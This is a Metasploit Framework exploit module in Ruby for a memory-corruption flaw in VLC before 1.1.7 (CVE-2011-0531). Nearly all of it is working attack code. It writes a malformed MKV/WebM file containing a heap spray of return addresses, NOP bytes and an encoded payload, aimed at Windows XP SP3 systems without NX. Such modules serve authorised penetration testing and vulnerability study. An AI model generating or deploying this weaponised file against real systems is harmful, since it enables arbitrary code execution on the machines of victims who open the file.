metasploit-framework/modules/exploits/windows/fileformat/vlc_webm.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'VideoLAN VLC MKV Memory Corruption',
			'Description'    => %q{
					This module exploits an input validation error in VideoLAN VLC
				< 1.1.7.  By creating a malicious MKV or WebM file, a remote attacker
				could execute arbitrary code.

				NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to 
				permanently enable NX support on machines that support it. As such,
				This module will only work against systems that do not support NX or
				are too old to have SetProcessDEPPolicy.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Dan Rosenberg' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'OSVDB', '70698' ],
					[ 'CVE', '2011-0531' ],
					[ 'BID', '46060' ],
					[ 'URL', 'http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456' ],
					[ 'URL', 'http://www.videolan.org/security/sa1102.html' ]
				],
			'Payload'        =>
				{
					'Space'           => 1024,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP SP3 (w/o NX)',
						{
							'Ret' => 0x04040404, # 0x6a954ff0,
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 31, 2011',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'msf.mkv']),
			], self.class)
	end

	def exploit

		# EBML Header
		file =  "\x1A\x45\xDF\xA3"	# EBML
		file << "\x01\x00\x00\x00"
		file << "\x00\x00\x00\x1F"
		file << "\x42\x86\x81\x01"	# EBMLVersion = 1
		file << "\x42\xF7\x81\x01"	# EBMLReadVersion = 1
		file << "\x42\xF2\x81\x04"	# EBMLMaxIDLength = 4
		file << "\x42\xF3\x81\x08"	# EBMLMaxSizeLength = 8
		file << "\x42\x82\x84\x77"	# DocType = "webm"
		file << "\x65\x62\x6D"
		file << "\x42\x87\x81\x02"	# DocTypeVersion = 2
		file << "\x42\x85\x81\x02"	# DocTypeReadVersion = 2

		# Segment data
		file << "\x18\x53\x80\x67"	# (0) Segment
		file << "\x01\x00\x00\x00"
		file << "\x01\xD6\x22\xF1"

		# Seek data
		file << "\x11\x4D\x9B\x74"	# (1) SeekHead
		file << "\x40\x3F"

		file << "\x4D\xBB\x8B"		# (2) Seek
		file << "\x53\xAB\x84"		# (3) SeekID = Segment Info
		file << "\x15\x49\xA9\x66"	#

		file << "\x53\xAC\x81"		# (3) SeekPosition
		file << "\xff"			# 	index of segment info

		file << "\x53\xAB\x84"		# (3) SeekID = Tracks
		file << "\x16\x54\xAE\x6B"	#

		file << "\x42" * 228 		# Padding

		# Data
		file << "\x15\x49\xA9\x66"	# (1) Segment Info
		file << "\x01\x00\x00\x00"	#
		file << "\x01\xff\xff\xff"	# This triggers our heap spray...
		file << [target.ret].pack('V')	# Object address

		# Spray some data
		#block = Rex::Text.pattern_create(0x100000 - payload.encoded.length)
		#block = "A" * (0x100000 - payload.encoded.length)
		block = ([target.ret].pack('V') * (0x200000))

		2.times {
			block[0, 4] = "\x90" * 4
			block[4, 4] = "\x05" * 4
			#block[5426, 4] = [0xdeadbeef].pack('V')
			file << block
			file << payload.encoded
		}

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(file)

	end
end